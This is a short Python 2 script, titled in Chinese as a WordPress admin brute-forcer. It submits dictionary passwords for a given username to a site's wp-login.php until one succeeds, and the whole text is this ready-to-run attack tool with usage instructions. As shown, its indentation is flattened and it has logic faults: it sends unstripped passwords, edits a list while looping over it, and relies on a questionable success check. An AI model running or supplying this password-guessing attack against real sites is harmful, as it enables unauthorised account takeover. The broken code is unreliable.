#!/usr/bin/env python
#Coding = UTF-8
#wordpress后台暴力破解(python)
#python wordpress_bruteforce.py http://xxxx.com/wp-login.php xxxx dic.txt
import urllib, time, sys
start = time.time()
errors = []
def exploit(url, name, dictionary):
for line in open(dictionary):
lineline = line.strip()
try:
data = urllib.urlencode({'log':name,'pwd':line,'redirect_to':''})
content = urllib.urlopen(url, data)
if content.read() == '':
print "Password is : %s" % line
print time.time() - start
sys.exit()
else:
print "try %s failed" % line
except IOError:
errors.append(line)
print "try %s occurs IOERROR, add to list and retry it later" % line
if __name__ == "__main__":
if len(sys.argv) < 4:
print 'Usage: Url AdminName Dictionary'
sys.exit(1)
exploit(sys.argv[1], sys.argv[2], sys.argv[3])
while errors:
for i,line in enumerate(errors):
try:
data = urllib.urlencode({'log':sys.argv[2],'pwd':line,'redirect_to':''})
content = urllib.urlopen(sys.argv[1], data)
if content.read() == '':
print "Password is : %s" % line
print time.time() - start
sys.exit()
else:
print "try %s failed" % line
del errors[i]
except IOError:
errors.append(line)
print "try %s occurs IOERROR, add to list and retry it later" % line
print time.time() - start